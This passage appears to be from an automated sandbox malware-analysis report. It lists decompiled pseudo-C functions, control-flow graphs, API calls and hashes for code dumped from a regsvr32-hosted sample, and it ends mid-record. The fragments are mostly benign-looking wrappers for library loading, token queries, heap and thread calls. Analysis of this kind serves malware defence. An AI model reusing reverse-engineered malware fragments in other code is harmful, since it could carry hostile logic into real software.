                                                                                                                                                                        control_flow_graph 308 536f05c-536f07c call 5369dd8 311 536f086-536f08b LoadLibraryA 308->311 312 536f07e-536f084 GetModuleHandleA 308->312 313 536f08d-536f08f 311->313 312->313 314 536f091-536f096 call 536f011 313->314 315 536f09e-536f0ac call 5368b9c 313->315 318 536f09b-536f09c 314->318 318->315
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E0536F05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E05369DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0536F011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E05368B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                        0x0536f05f
                                                                                                                                                                        0x0536f062
                                                                                                                                                                        0x0536f068
                                                                                                                                                                        0x0536f06a
                                                                                                                                                                        0x0536f06f
                                                                                                                                                                        0x0536f071
                                                                                                                                                                        0x0536f07b
                                                                                                                                                                        0x0536f07c
                                                                                                                                                                        0x0536f08b
                                                                                                                                                                        0x0536f07e
                                                                                                                                                                        0x0536f07e
                                                                                                                                                                        0x0536f07e
                                                                                                                                                                        0x0536f08f
                                                                                                                                                                        0x0536f096
                                                                                                                                                                        0x0536f09c
                                                                                                                                                                        0x0536f09c
                                                                                                                                                                        0x0536f0a1
                                                                                                                                                                        0x0536f0ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 25f32da69277df73c6ede5021464f02f43023f1a38a39ca9bb2fc9b8482948ee
                                                                                                                                                                        • Instruction ID: 785e16c45824593e930ce4d554a3483c6e4b539ab13c7736417daede5066f22f
                                                                                                                                                                        • Opcode Fuzzy Hash: 25f32da69277df73c6ede5021464f02f43023f1a38a39ca9bb2fc9b8482948ee
                                                                                                                                                                        • Instruction Fuzzy Hash: CBF0EC32710118ABCB14ABADF8498AAB7EDEF48250710813EF506D7158EEB0DE4187A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536C8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 320 536c8c9-536c8e8 call 536c79e 323 536c983-536c986 320->323 324 536c8ee-536c905 call 536c7f5 320->324 327 536c907-536c928 324->327 328 536c965-536c973 FindCloseChangeNotification 324->328 327->328 334 536c92a-536c92c 327->334 329 536c975-536c980 call 5368bf4 328->329 330 536c981 328->330 329->330 330->323 335 536c92e-536c931 334->335 336 536c958-536c963 334->336 337 536c934-536c943 335->337 336->328 340 536c955-536c957 337->340 341 536c945-536c951 337->341 340->336 341->337 342 536c953 341->342 342->336
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E0536C8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0536C79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0536C7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E05368BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x537f820; // 0x546faa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x537f820; // 0x546faa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x537f820; // 0x546faa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                        0x0536c8d0
                                                                                                                                                                        0x0536c8d2
                                                                                                                                                                        0x0536c8d9
                                                                                                                                                                        0x0536c8db
                                                                                                                                                                        0x0536c8de
                                                                                                                                                                        0x0536c8e3
                                                                                                                                                                        0x0536c8e8
                                                                                                                                                                        0x0536c8f2
                                                                                                                                                                        0x0536c8f5
                                                                                                                                                                        0x0536c8f8
                                                                                                                                                                        0x0536c8fd
                                                                                                                                                                        0x0536c8ff
                                                                                                                                                                        0x0536c905
                                                                                                                                                                        0x0536c965
                                                                                                                                                                        0x0536c96d
                                                                                                                                                                        0x0536c973
                                                                                                                                                                        0x0536c97a
                                                                                                                                                                        0x0536c980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c981
                                                                                                                                                                        0x0536c90a
                                                                                                                                                                        0x0536c90b
                                                                                                                                                                        0x0536c90c
                                                                                                                                                                        0x0536c90d
                                                                                                                                                                        0x0536c90e
                                                                                                                                                                        0x0536c90f
                                                                                                                                                                        0x0536c910
                                                                                                                                                                        0x0536c911
                                                                                                                                                                        0x0536c916
                                                                                                                                                                        0x0536c918
                                                                                                                                                                        0x0536c91d
                                                                                                                                                                        0x0536c91e
                                                                                                                                                                        0x0536c928
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c92c
                                                                                                                                                                        0x0536c958
                                                                                                                                                                        0x0536c958
                                                                                                                                                                        0x0536c960
                                                                                                                                                                        0x0536c963
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c963
                                                                                                                                                                        0x0536c92e
                                                                                                                                                                        0x0536c92e
                                                                                                                                                                        0x0536c931
                                                                                                                                                                        0x0536c934
                                                                                                                                                                        0x0536c934
                                                                                                                                                                        0x0536c937
                                                                                                                                                                        0x0536c939
                                                                                                                                                                        0x0536c943
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c948
                                                                                                                                                                        0x0536c949
                                                                                                                                                                        0x0536c94c
                                                                                                                                                                        0x0536c951
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c953
                                                                                                                                                                        0x0536c957
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c957
                                                                                                                                                                        0x0536c986

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536C79E: GetCurrentThread.KERNEL32 ref: 0536C7B1
                                                                                                                                                                          • Part of subcall function 0536C79E: OpenThreadToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7B8
                                                                                                                                                                          • Part of subcall function 0536C79E: GetLastError.KERNEL32(?,?,0536C8E3,00000000,05360000), ref: 0536C7BF
                                                                                                                                                                          • Part of subcall function 0536C79E: OpenProcessToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7E4
                                                                                                                                                                          • Part of subcall function 0536C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05360000,00000000,00000000,?,0536C876,00000000,00000000,?,0536C89F), ref: 0536C810
                                                                                                                                                                          • Part of subcall function 0536C7F5: GetLastError.KERNEL32(?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05360000), ref: 0536C96D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: d85f6515f2fd2b24df21c34a3478bcf6ccc875d28cdf7a003be175e7a81695e7
                                                                                                                                                                        • Instruction ID: 7ebb3d2974c06f19f7c5a8401ac19c74753764a515233da7ca0dd56ff08f248b
                                                                                                                                                                        • Opcode Fuzzy Hash: d85f6515f2fd2b24df21c34a3478bcf6ccc875d28cdf7a003be175e7a81695e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C216A32A0020DAFDB10DFA9D885AAEBBF8FF08600F508469E551E7155DB70EE418B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05366298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 343 5366298-53662b1 call 5366412 GetOEMCP call 536df3d 348 53662b6-53662e1 call 5373bd5 343->348 349 53662b3-53662b4 343->349 353 53662e3-53662e9 348->353 354 53662eb-53662f1 call 536d804 348->354 350 536632b 349->350 355 5366305-5366311 353->355 357 53662f6-53662fd 354->357 358 5366323 call 53635a1 355->358 359 5366313-5366318 call 536611b 355->359 360 53662ff 357->360 361 536631a-5366321 357->361 365 5366328-536632a 358->365 359->365 360->355 361->358 361->365 365->350
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05366298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E05366412();
				GetOEMCP();
				_t13 = E0536DF3D(__fp0); // executed
				 *0x537f81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x537f81c; // 0x546fbe8
					_t2 = _t14 + 0x224; // 0x5360000
					E05373BD5( *_t2);
					_t26 =  *0x537f81c; // 0x546fbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x5360000, executed
						_t26 =  *_t7;
						_t16 = E0536D804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x537f81c; // 0x546fbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E053635A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x537f81c; // 0x546fbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E0536611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                        0x05366298
                                                                                                                                                                        0x05366298
                                                                                                                                                                        0x0536629d
                                                                                                                                                                        0x053662a4
                                                                                                                                                                        0x053662a9
                                                                                                                                                                        0x053662b1
                                                                                                                                                                        0x053662ba
                                                                                                                                                                        0x053662c0
                                                                                                                                                                        0x053662c5
                                                                                                                                                                        0x053662cb
                                                                                                                                                                        0x053662d0
                                                                                                                                                                        0x053662d6
                                                                                                                                                                        0x053662d7
                                                                                                                                                                        0x053662e1
                                                                                                                                                                        0x053662eb
                                                                                                                                                                        0x053662eb
                                                                                                                                                                        0x053662f1
                                                                                                                                                                        0x053662f6
                                                                                                                                                                        0x053662f8
                                                                                                                                                                        0x053662fd
                                                                                                                                                                        0x0536631a
                                                                                                                                                                        0x05366321
                                                                                                                                                                        0x05366328
                                                                                                                                                                        0x05366328
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536632a
                                                                                                                                                                        0x05366323
                                                                                                                                                                        0x05366323
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05366323
                                                                                                                                                                        0x053662ff
                                                                                                                                                                        0x05366305
                                                                                                                                                                        0x05366305
                                                                                                                                                                        0x0536630a
                                                                                                                                                                        0x05366311
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05366313
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05366313
                                                                                                                                                                        0x053662e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053662e3
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 0536629D
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetCurrentProcessId.KERNEL32 ref: 0536DF64
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetLastError.KERNEL32 ref: 0536E05E
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetSystemMetrics.USER32(00001000), ref: 0536E06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1196160345-0
                                                                                                                                                                        • Opcode ID: c180cab3bf0bb3307e2d9146eab6da62376427e8198e854d2aa8d63c0a6b8a83
                                                                                                                                                                        • Instruction ID: aeff144b29f81ccd3766ce033f3cc6e8f6e69ad7d72b81822e9cc030bf33af8c
                                                                                                                                                                        • Opcode Fuzzy Hash: c180cab3bf0bb3307e2d9146eab6da62376427e8198e854d2aa8d63c0a6b8a83
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E017C31A142069EC325FBA8E54AAE5BBE9BB4A350F15C27DE006CF129CBB04481CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536C879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 366 536c879-536c892 368 536c896-536c8a3 call 536c862 366->368 369 536c894-536c895 366->369 372 536c8a5-536c8a8 368->372 373 536c8b9-536c8c4 FindCloseChangeNotification 368->373 374 536c8b5-536c8b7 372->374 375 536c8aa-536c8af 372->375 376 536c8c6-536c8c8 373->376 374->376 375->374
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536C879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x537f820; // 0x546faa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0536C862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x537f818; // 0x546f8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                        0x0536c87d
                                                                                                                                                                        0x0536c885
                                                                                                                                                                        0x0536c88d
                                                                                                                                                                        0x0536c892
                                                                                                                                                                        0x0536c89a
                                                                                                                                                                        0x0536c89f
                                                                                                                                                                        0x0536c8a3
                                                                                                                                                                        0x0536c8c1
                                                                                                                                                                        0x0536c8c4
                                                                                                                                                                        0x0536c8a5
                                                                                                                                                                        0x0536c8a8
                                                                                                                                                                        0x0536c8aa
                                                                                                                                                                        0x0536c8b2
                                                                                                                                                                        0x0536c8b2
                                                                                                                                                                        0x0536c8b5
                                                                                                                                                                        0x0536c8b5
                                                                                                                                                                        0x0536c8c8
                                                                                                                                                                        0x0536c895
                                                                                                                                                                        0x0536c895
                                                                                                                                                                        0x0536c895

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a4be3ea38e1c6a13d2c1685cee6516634d9a34179ffd3e0e395314bd00a2884e
                                                                                                                                                                        • Instruction ID: 4ea37425a4d082f96e9923c7d5eee682b0253e87447433f5dd97deb8a17b00ee
                                                                                                                                                                        • Opcode Fuzzy Hash: a4be3ea38e1c6a13d2c1685cee6516634d9a34179ffd3e0e395314bd00a2884e
                                                                                                                                                                        • Instruction Fuzzy Hash: F7F03A32A1020CFBDB22EBA5D906E9D77FDFB08745F0191A8E541EB150DB70DE009B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536632E() {
				intOrPtr _t3;

				_t3 =  *0x537f818; // 0x546f8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x537f83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                        0x0536632e
                                                                                                                                                                        0x0536633b
                                                                                                                                                                        0x05366345

                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05366345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: 393f9b1be1d547460c8292855f542a82d0a84ca660678e97179d0b3fa1a81f6d
                                                                                                                                                                        • Instruction ID: 9dce39028245b0f933a180e59604504333404f1d609a208bdb8a2d7a7f5a3b2f
                                                                                                                                                                        • Opcode Fuzzy Hash: 393f9b1be1d547460c8292855f542a82d0a84ca660678e97179d0b3fa1a81f6d
                                                                                                                                                                        • Instruction Fuzzy Hash: 96C00271624014AFC752AB64E84AF483BE4FF0D322F1187A4F529DE1E5CF2094819B41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05368BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05368BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x537f900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                        0x05368bec
                                                                                                                                                                        0x05368bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 251415040dd3b1b8c40e48261a1aa7a5de1edcf7107bf0fd9d79be286672529d
                                                                                                                                                                        • Instruction ID: 636145301a91d12d05db9d6c1ec4cd81d114dda91c069905f955fa9f74f65bb3
                                                                                                                                                                        • Opcode Fuzzy Hash: 251415040dd3b1b8c40e48261a1aa7a5de1edcf7107bf0fd9d79be286672529d
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CB092324A020CBBCB611A91EC06B843F3DF705761F004010F60C48060DF6264209B80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536DA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0536DA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                        0x0536da5f
                                                                                                                                                                        0x0536da67
                                                                                                                                                                        0x0536da6c

                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,0536D8C2,?,?,00000001), ref: 0536DA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: 7a2fd18e8dca3d0c2c91cf2135e7eb5f729f7a2c764173b4134938b4d21d2339
                                                                                                                                                                        • Instruction ID: fc29ae7c0817c74ed0ba2379f65a0d7eafa2595f5c2a32acfaa3dc77026f4162
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a2fd18e8dca3d0c2c91cf2135e7eb5f729f7a2c764173b4134938b4d21d2339
                                                                                                                                                                        • Instruction Fuzzy Hash: FBB092322A0005ABCB015B74E80B9903BE0FB56706B98C2F4F005CA061C72AC4868A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05368BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05368BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x537f900 = _t1;
				return _t1;
			}




                                                                                                                                                                        0x05368bd2
                                                                                                                                                                        0x05368bd8
                                                                                                                                                                        0x05368bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,05366502), ref: 05368BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: ee7b6567030490bf5b4937ff6fc9865069fdb9d0dc480ab32d1c42f84a718055
                                                                                                                                                                        • Instruction ID: c52694a5003f420a387c6751cfc89996cd35d6b4e6d7fb6f52e6930259fae291
                                                                                                                                                                        • Opcode Fuzzy Hash: ee7b6567030490bf5b4937ff6fc9865069fdb9d0dc480ab32d1c42f84a718055
                                                                                                                                                                        • Instruction Fuzzy Hash: 45B01270BA130C67D6700B105C07F003F147380B02F100140B605DC1C0EFA02000A504
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536DA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E0536DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0536A0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                        0x0536da70
                                                                                                                                                                        0x0536da71
                                                                                                                                                                        0x0536da74
                                                                                                                                                                        0x0536da77
                                                                                                                                                                        0x0536da7c
                                                                                                                                                                        0x0536da7f
                                                                                                                                                                        0x0536da82
                                                                                                                                                                        0x0536da82
                                                                                                                                                                        0x0536da8a
                                                                                                                                                                        0x0536da8f
                                                                                                                                                                        0x0536da92
                                                                                                                                                                        0x0536da95
                                                                                                                                                                        0x0536da98
                                                                                                                                                                        0x0536da9b
                                                                                                                                                                        0x0536daae
                                                                                                                                                                        0x0536daaf
                                                                                                                                                                        0x0536dab2
                                                                                                                                                                        0x0536dab8
                                                                                                                                                                        0x0536dabb
                                                                                                                                                                        0x0536dabe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536dac0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536dabe
                                                                                                                                                                        0x0536dac4
                                                                                                                                                                        0x0536dac4
                                                                                                                                                                        0x0536dac6
                                                                                                                                                                        0x0536dac6
                                                                                                                                                                        0x0536dac9
                                                                                                                                                                        0x0536dac9
                                                                                                                                                                        0x0536dace
                                                                                                                                                                        0x0536dad6
                                                                                                                                                                        0x0536dae2

                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 0536DAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 8296c352f53417caba932f69dd2073ca2ab6422b3ace2e1f5a63de1e9b908306
                                                                                                                                                                        • Instruction ID: 6133b844420d525ea636ef9e08345a3be06152b00a7d0c47336591675b1af880
                                                                                                                                                                        • Opcode Fuzzy Hash: 8296c352f53417caba932f69dd2073ca2ab6422b3ace2e1f5a63de1e9b908306
